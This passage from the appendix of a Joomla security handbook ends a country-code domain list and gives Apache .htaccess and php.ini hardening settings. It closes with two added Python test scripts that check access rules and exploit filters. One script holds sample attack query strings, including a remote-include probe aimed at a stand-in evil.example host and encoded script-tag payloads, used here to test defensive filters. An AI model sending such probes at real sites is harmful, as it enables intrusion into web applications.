Appendix [ 227 ]

.IL Israel—Internet Society of Israel
.IM Isle of Man—Isle of Man Government
.IN India
.INFO Generic—Generic top-level domain
.INT Used only for registering organizations established by international treaties between governments—Internet Assigned Numbers Authority
.IO British Indian Ocean Territory—.IO Top Level Domain Registry
.IQ Iraq—National Communications and Media Commission of Iraq
.IR Iran, Islamic Republic of—Institute for Studies in Theoretical Physics & Mathematics (IPM)
.IS Iceland
.IT Italy
.JE Jersey
.JM Jamaica
.JO Jordan
.JOBS Reserved for human resource managers
.JP Japan
.KE Kenya
.KG Kyrgyzstan
.KH Cambodia
.KI Kiribati
.KM Comoros
.KN Saint Kitts and Nevis
.KP Korea, Democratic People's Republic of
.KR Korea, Republic of—National Internet Development Agency of Korea
.KW Kuwait—Ministry of Communications
.KY Cayman Islands—The Information and Communications Technology Authority
.KZ Kazakhstan—Association of IT Companies of Kazakhstan
.LA Lao People's Democratic Republic
.LB Lebanon
.LC Saint Lucia
.LI Liechtenstein

This material is copyright and is licensed for the sole use by Thomas Rosenblum on 4th December 2008 1010 SW High Ave., , Topeka, , 66604

Security Handbook [ 228 ]

.LK Sri Lanka—.LK Domain Registrar
.LR Liberia
.LT Lithuania
.LU Luxembourg
.LV Latvia
.LY Libyan Arab Jamahiriya
.MA Morocco
.MC Monaco
.MD Moldova
.ME Montenegro
.MF Saint Martin
.MG Madagascar
.MH Marshall Islands
.MIL Reserved exclusively for the United States Military
.MK Macedonia, The Former Yugoslav Republic of
.ML Mali
.MM Myanmar
.MN Mongolia
.MO Macao—University of Macau
.MOBI Reserved for consumers and providers of mobile products and services
.MP Northern Mariana Islands
.MQ Martinique
.MR Mauritania
.MS Montserrat
.MT Malta
.MU Mauritius
.MUSEUM Reserved for museums
.MV Maldives
.MW Malawi
.MX Mexico
.MY Malaysia
.MZ Mozambique
.NA Namibia
.NAME Reserved for individuals
.NC New Caledonia
.NE Niger
.NET Generic top-level domain
.NF Norfolk Island
.NG Nigeria—Government c/o National Information Technology Development Agency (NITDA)
.NI Nicaragua
.NL Netherlands
.NO Norway
.NP Nepal
.NR Nauru
.NU Niue
.NZ New Zealand
.OM Oman
.ORG Generic top-level domain
.PA Panama
.PE Peru
.PF French Polynesia
.PG Papua New Guinea
.PH Philippines
.PK Pakistan
.PL Poland
.PM Saint Pierre and Miquelon
.PN Pitcairn
.PR Puerto Rico
.PRO Restricted to credentialed professionals and related entities
.PS Palestinian Territory, Occupied
.PT Portugal
.PW Palau
.PY Paraguay
.QA Qatar
.RE Reunion
.RO Romania
.RS Serbia
.RU Russian Federation
.RW Rwanda
.SA Saudi Arabia
.SB Solomon Islands
.SC Seychelles
.SD Sudan
.SE Sweden
.SG Singapore
.SH Saint Helena
.SI Slovenia
.SJ Svalbard and Jan Mayen
.SK Slovakia
.SL Sierra Leone
.SM San Marino
.SN Senegal
.SO Somalia
.SR Suriname
.ST Sao Tome and Principe
.SU Soviet Union (being phased out)
.SV El Salvador
.SY Syrian Arab Republic
.SZ Swaziland
.TC Turks and Caicos Islands
.TD Chad
.TEL Reserved for businesses and individuals to publish contact data
.TF French Southern Territories
.TG Togo
.TH Thailand
.TJ Tajikistan
.TK Tokelau
.TL Timor-Leste
.TM Turkmenistan
.TN Tunisia
.TO Tonga
.TP Portuguese Timor (being phased out)
.TR Turkey
.TRAVEL Reserved for entities whose primary area of activity is in the travel industry
.TT Trinidad and Tobago
.TV Tuvalu
.TW Taiwan
.TZ Tanzania, United Republic of
.UA Ukraine
.UG Uganda
.UK United Kingdom
.UM United States Minor Outlying Islands
.US United States
.UY Uruguay
.UZ Uzbekistan
.VA Holy See (Vatican City State)
.VC Saint Vincent and the Grenadines
.VE Venezuela
.VG Virgin Islands, British
.VI Virgin Islands, U.S.
.VN Viet Nam
.VU Vanuatu
.WF Wallis and Futuna
.WS Samoa
.YE Yemen
.YT Mayotte
.YU Yugoslavia (being phased out)
.ZA South Africa
.ZM Zambia
.ZW Zimbabwe

List of Critical Settings

Following is the list of critical settings regarding .htaccess and php.ini files.

.htaccess

Rule one: Password-protect a single file.

# password-protect single file
<Files secure.php>
AuthType Basic
AuthName "Prompt"
AuthUserFile /home/path/.htpasswd
Require valid-user
</Files>

Rule two: Use FilesMatch to password-protect multiple files.

# password-protect multiple files
# the pattern has to cover the whole file name, extension included: a bare
# ^(execute|index|secure|insanity|biscuit)*$ only matches extension-less names
# (and the empty name), so secure.php would stay unprotected
<FilesMatch "^(execute|index|secure|insanity|biscuit)\.php$">
AuthType Basic
AuthName "Development"
AuthUserFile /home/path/.htpasswd
Require valid-user
</FilesMatch>

Rule three: Password-protect a directory, in this case the one containing .htaccess.

# password-protect the directory in which this .htaccess rule resides
AuthType Basic
AuthName "This directory is protected"
AuthUserFile /home/path/.htpasswd
AuthGroupFile /dev/null
Require valid-user

In all three rules, AuthUserFile is the absolute path of a file created with the htpasswd utility; keep it outside the web root so it can never be served. Basic authentication sends the password base64-encoded, not encrypted, so protected areas should also be forced onto SSL (see "Activate SSL via .htaccess" below).

Rule Four: Password-protect against all IPs except the one you specify.
# password-protect directory for every IP except the one specified
# place in the .htaccess file of a directory to protect that entire directory
AuthType Basic
AuthName "Personal"
AuthUserFile /home/path/.htpasswd
Require valid-user
# Order and Deny are required here. Apache's default Order is Deny,Allow, and
# with no Deny directive every client passes the host check, so "Satisfy Any"
# would let everyone in without a password.
Order Deny,Allow
Deny from all
Allow from 99.88.77.66
Satisfy Any

# password prompt for visitors
AuthType Basic
AuthName "This site is currently under construction"
AuthUserFile /home/path/.htpasswd
AuthGroupFile /dev/null
Require valid-user
# allow the webmaster and any others open access
# (the Order keywords are separated by a comma only; a space is a syntax error)
Order Deny,Allow
Deny from all
# the allow from below could be your IP to make it easier to get in
Allow from 111.222.33.4
# Allow from favorite.validation/services/   <- placeholder from the original list;
#   Allow from takes an address, a network or a domain name, never a URL path
Allow from googlebot.com
Satisfy Any

Satisfy Any means a client only has to pass one of the two checks: anyone on the Allow list skips the password entirely. A domain name in Allow from (googlebot.com above) makes Apache do a reverse lookup of the client address followed by a forward lookup to confirm it; that costs a DNS round trip per request and is only as trustworthy as the DNS involved, so prefer addresses where you can.

Activate SSL via .htaccess:

# require SSL (mod_ssl directives)
SSLOptions +StrictRequire
SSLRequireSSL
SSLRequire %{HTTP_HOST} eq "domain.tld"
ErrorDocument 403 https://domain.tld

# require SSL without mod_ssl directives: redirect plain HTTP to HTTPS
# RewriteEngine on is needed once per .htaccess and is assumed by every
# mod_rewrite snippet in this list
RewriteEngine on
RewriteCond %{HTTPS} !=on [NC]
RewriteRule ^.*$ https://%{SERVER_NAME}%{REQUEST_URI} [R,L]

Custom error pages and error messages:

# serve custom error pages
ErrorDocument 400 /errors/400.html
ErrorDocument 401 /errors/401.html
ErrorDocument 403 /errors/403.html
ErrorDocument 404 /errors/404.html
ErrorDocument 500 /errors/500.html

# provide a universal error document
# (an internal rewrite answers 200 unless error.php itself sends the
# right status, e.g. 404, so crawlers do not index the error page)
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^.*$ /dir/error.php [L]

# deny access to bad robots, site rippers and offline browsers
RewriteBase /
RewriteCond %{HTTP_USER_AGENT} ^Anarchie [OR]
RewriteCond %{HTTP_USER_AGENT} ^ASPSeek [OR]
RewriteCond %{HTTP_USER_AGENT} ^attach [OR]
RewriteCond %{HTTP_USER_AGENT} ^autoemailspider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Xaldon\ WebSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Xenu [OR]
RewriteCond %{HTTP_USER_AGENT} ^Zeus.*Webster [OR]
RewriteCond %{HTTP_USER_AGENT} ^Zeus
# keep exactly ONE of the three RewriteRules below: the RewriteConds apply
# only to the RewriteRule that immediately follows them, so a second or third
# rule pasted after the first has no conditions and would redirect every visitor
RewriteRule ^.* - [F,L]
# send visitor to site of your choice
# RewriteRule ^.*$ http://www.hellish-website.com [R,L]
# send the bad guys to a virtual black hole of fake email addresses
# RewriteRule ^.*$ http://english-61925045732.spampoison.com [R,L]

# stop hotlinking and serve alternate content
<IfModule mod_rewrite.c>
RewriteEngine on
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http://(www\.)?domain\.com/.*$ [NC]
# the replacement image must be excluded, otherwise the redirect to it
# matches the same rule again and loops
RewriteCond %{REQUEST_URI} !donotsteal\.jpg$ [NC]
RewriteRule .*\.(gif|jpg)$ http://www.domain.com/donotsteal.jpg [R,NC,L]
</IfModule>

# block a network via network/netmask values
deny from 99.1.0.0/255.255.0.0
# block a single address
deny from 99.88.77.66
# block two unique IP addresses
deny from 99.88.77.66 11.22.33.44
# block three ranges of IP addresses (partial addresses match on the leading octets)
deny from 99.88 99.88.77 11.22.33

In the following example, all IP addresses are allowed access except for 12.345.67.890 (a placeholder, not a valid address) and domain.com:

# allow all except those indicated here
# NOTE: restrictions inside <Limit GET POST PUT> apply to those three methods
# only; other methods stay unrestricted. Leave the <Limit> wrapper out unless
# that is really what you want.
<Limit GET POST PUT>
Order Allow,Deny
Allow from all
Deny from 12.345.67.890
# Deny from takes a domain-name suffix, not a regular expression
Deny from domain.com
</Limit>

# disable directory browsing
# ("Options All -Indexes" mixes absolute and relative forms, which Apache
# rejects as a syntax error)
Options -Indexes

# prevent viewing of a specific file
<Files secretfile.doc>
Order Allow,Deny
Deny from all
</Files>

# hide select file types from directory listings
# (IndexIgnore only affects the automatic index; it does not stop a direct
# request for the file. *.etc is a placeholder for further patterns.)
IndexIgnore *.wmv *.mp4 *.avi *.etc

Make sure your .htaccess contains this entry:

########## Begin - Rewrite rules to block out some common exploits
## If you experience problems on your site block out the operations listed below
## This attempts to block the most common type of exploit `attempts` to Joomla!
RewriteEngine on
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Answer all blocked requests with 403 Forbidden; with the F flag the
# index.php substitution is ignored, so nothing is sent to the homepage
RewriteRule ^(.*)$ index.php [F,L]
########### End - Rewrite rules to block out some common exploits

These patterns are a blacklist of known request shapes, matched against the raw (still URL-encoded) query string. They stop the common automated probes; they do not make an unpatched extension safe, and only the <script> rule is case-insensitive ([NC]).

php.ini

Settings you should make in your php.ini file:

register_globals = off (or =0)

allow_url_fopen = off
(On PHP 5.2 and later also set allow_url_include = off; it controls remote include/require separately from allow_url_fopen.)

define( 'RG_EMULATION', 0 )
This one is not a php.ini directive: Joomla 1.0.x sets it in globals.php, where it switches off Joomla's own emulation of register_globals. Set it to 0 there.

Security Handbook [ 236 ]

Turn off PHP version information:
expose_php = 0

Disable file uploads (CAUTION: it may affect some extensions):
file_uploads = off

Prevent or lower the possibility of a session fixation attack by keeping the session ID out of URLs:
session.use_trans_sid = off
(Setting session.use_only_cookies = 1 as well makes PHP ignore a session ID passed in the URL.)

References to Learn More about php.ini

http://shiflett.org: Chris Shiflett's site; he is the author of Essential PHP Security, a must read.
http://perishablepress.com/press/2006/01/10/stupid-htaccess-tricks
http://articles.techrepublic.com.com/5100-22-5268948.html
http://phpsec.org/

General Apache Information

This book is not aimed at hardcore Apache administrators. Included here are a few important directives that you might find useful. If you have access to your Apache server, you can check your settings. If not, please consult your host.

INCLUDES
Options +Includes
Turns on the capability to have SSI (Server Side Includes) in files, including #exec, which runs shell commands and CGI programs from within a parsed page.

IncludesNOEXEC
Options +IncludesNOEXEC
This also turns on SSI, but disables #exec cmd and #exec cgi; it does not stop #include virtual of a CGI script that lives in a ScriptAliased directory. Use it instead of +Includes (not in addition to it) wherever the server parses content that users can write. This removes the bulk of the risk associated with the Server Side Include attack, in which an attacker runs commands through a page they are able to edit.
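The Order/Allow/Deny/Satisfy interplay behind Rule Four, the "password prompt for visitors" block and the IP deny lists is easy to get wrong, so here is an added example (not code from the Security Handbook or from Apache) that reimplements the Apache 2.2 mod_authz_host decision logic and runs the snippets above against constructed client addresses. It handles "all", full, partial, network/netmask and CIDR arguments; domain names (googlebot.com) are assumed never to match, since this evaluator does no DNS. The client addresses and the "stranger" scenario are assumptions made for the demonstration.

```python
"""Evaluator for Apache 2.2 host access control (Order / Allow / Deny / Satisfy).

Added example; not code from the Security Handbook or from Apache. It mirrors
the mod_authz_host rules so the .htaccess snippets above can be checked
against sample clients without a running server. Domain-name arguments are
never matched here (Apache would resolve them with a double-reverse lookup).
"""
import ipaddress

ALLOW_DENY = "allow,deny"   # default deny; a Deny match always wins
DENY_ALLOW = "deny,allow"   # default allow; an Allow match always wins (Apache's default)


def _matches(client: str, spec: str) -> bool:
    """Return True if one Allow/Deny argument covers the client address."""
    if spec.lower() == "all":
        return True
    if "/" in spec:
        net, mask = spec.split("/", 1)
        if "." in mask:  # dotted netmask such as 255.255.0.0
            prefix = bin(int(ipaddress.IPv4Address(mask))).count("1")
        else:
            prefix = int(mask)  # CIDR length
        network = ipaddress.ip_network(f"{net}/{prefix}", strict=False)
        return ipaddress.ip_address(client) in network
    octets = spec.split(".")
    if len(octets) > 4 or not all(o.isdigit() for o in octets):
        return False  # domain name or placeholder: not evaluated here
    # full or partial address: the leading octets must agree
    return client.split(".")[:len(octets)] == octets


def host_access(client, order, allow=(), deny=()):
    """Apache 2.2 Order semantics for a single client address."""
    allowed = any(_matches(client, s) for s in allow)
    denied = any(_matches(client, s) for s in deny)
    if order == ALLOW_DENY:
        return allowed and not denied
    if order == DENY_ALLOW:
        return allowed or not denied
    raise ValueError(f"unknown Order: {order}")


def access_decision(client, order=DENY_ALLOW, allow=(), deny=(),
                    require_valid_user=False, authenticated=False, satisfy="all"):
    """Combine the host check with 'Require valid-user' under Satisfy All (default) or Any."""
    host_ok = host_access(client, order, allow, deny)
    if not require_valid_user:
        return host_ok
    if satisfy.lower() == "any":
        return host_ok or authenticated
    return host_ok and authenticated


def demo():
    """Rule four as printed versus with Order/Deny added, plus the deny lists and <Limit> block."""
    results = {}
    # Rule four exactly as printed: Allow from one address, Satisfy Any, but no
    # Order and no Deny, so Apache's default Order Deny,Allow lets every host pass
    results["rule4_as_printed_stranger"] = access_decision(
        "10.0.0.1", allow=["99.88.77.66"], require_valid_user=True, satisfy="any")
    # Rule four with "Order Deny,Allow" and "Deny from all" added
    fixed = dict(order=DENY_ALLOW, allow=["99.88.77.66"], deny=["all"],
                 require_valid_user=True, satisfy="any")
    results["rule4_fixed_stranger"] = access_decision("10.0.0.1", **fixed)
    results["rule4_fixed_listed_ip"] = access_decision("99.88.77.66", **fixed)
    results["rule4_fixed_with_password"] = access_decision("10.0.0.1", authenticated=True, **fixed)
    # the <Limit> block: Order allow,deny / allow from all / deny from two placeholders
    limit = dict(order=ALLOW_DENY, allow=["all"], deny=["12.345.67.890", "domain.com"])
    results["limit_stranger"] = access_decision("203.0.113.9", **limit)
    # stand-alone deny lists (default Order Deny,Allow, no Allow directive)
    results["partial_99_88"] = host_access("99.88.1.1", DENY_ALLOW, deny=["99.88", "99.88.77", "11.22.33"])
    results["netmask_inside"] = host_access("99.1.200.3", DENY_ALLOW, deny=["99.1.0.0/255.255.0.0"])
    results["netmask_outside"] = host_access("99.2.0.1", DENY_ALLOW, deny=["99.1.0.0/255.255.0.0"])
    return results


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name:30} {'allowed' if ok else 'denied'}")
```

The first result is the one worth remembering: with Rule Four copied verbatim, a client from any address and no password is admitted, because "Satisfy Any" only needs the host check to pass and, without "Deny from all", it always does.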
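To see what the "common exploits" RewriteCond block actually catches, here is an added example (not code from the Security Handbook or from the Joomla project) that applies the same five patterns to a set of constructed query strings. Apache tests %{QUERY_STRING} in its raw, still URL-encoded form, which the samples reproduce; re.IGNORECASE stands in for the [NC] flag on the <script> rule. The host evil.example and all sample strings are assumptions made for the demonstration.

```python
"""Test bench for the Joomla 'common exploits' RewriteCond block above.

Added example; not code from the Security Handbook or from Joomla. Each
RewriteCond is a PCRE run against the raw %{QUERY_STRING}; the patterns
below are the same expressions, with re.IGNORECASE replacing [NC].
"""
import re

# (rule name, pattern) in the order the RewriteConds appear; the first match wins
RULES = [
    ("mosConfig", re.compile(r"mosConfig_[a-zA-Z_]{1,21}(=|%3D)")),
    ("base64",    re.compile(r"base64_encode.*\(.*\)")),
    ("script",    re.compile(r"(<|%3C).*script.*(>|%3E)", re.IGNORECASE)),  # [NC]
    ("GLOBALS",   re.compile(r"GLOBALS(=|\[|%[0-9A-Z]{0,2})")),
    ("_REQUEST",  re.compile(r"_REQUEST(=|\[|%[0-9A-Z]{0,2})")),
]


def blocked_by(query_string: str):
    """Return the name of the first RewriteCond that fires, or None if the request passes."""
    for name, pattern in RULES:
        if pattern.search(query_string):
            return name
    return None


# constructed samples, as a Joomla 1.0-era .htaccess would see them in %{QUERY_STRING}
SAMPLES = {
    "option=com_content&task=view&id=12": None,                              # ordinary request
    "mosConfig_absolute_path=http://evil.example/shell.txt?": "mosConfig",  # remote-include probe
    "mosConfig_absolute_path%3Dhttp://evil.example/shell.txt": "mosConfig", # same, '=' encoded
    "q=base64_encode(file_get_contents(x))": "base64",
    "search=%3Cscript%3Ealert(1)%3C/script%3E": "script",                   # encoded <script>
    "search=<SCRIPT>alert(1)</SCRIPT>": "script",                            # [NC]: case-insensitive
    "GLOBALS[mosConfig_absolute_path]=x": "GLOBALS",
    "_REQUEST%5Boption%5D=com_foo": "_REQUEST",                              # '[' encoded as %5B
    # limits of a blacklist: no literal "script" or "mosConfig_" in the string
    "search=%3Csvg%20onload%3Dalert(1)%3E": None,
    "mosconfig_absolute_path=http://evil.example/": None,  # lower case; the rule (and PHP variable names) are case-sensitive
}


def run_samples():
    """Evaluate every constructed sample; returns {query_string: rule_or_None}."""
    return {qs: blocked_by(qs) for qs in SAMPLES}


if __name__ == "__main__":
    for qs, rule in run_samples().items():
        verdict = f"403 ({rule})" if rule else "pass"
        print(f"{verdict:18} {qs}")
```

The last two samples show the nature of the filter: a tag without the literal word "script" and any name the patterns do not list pass straight through. The rules cut down automated noise; they are no substitute for patching the extension that would process the parameter.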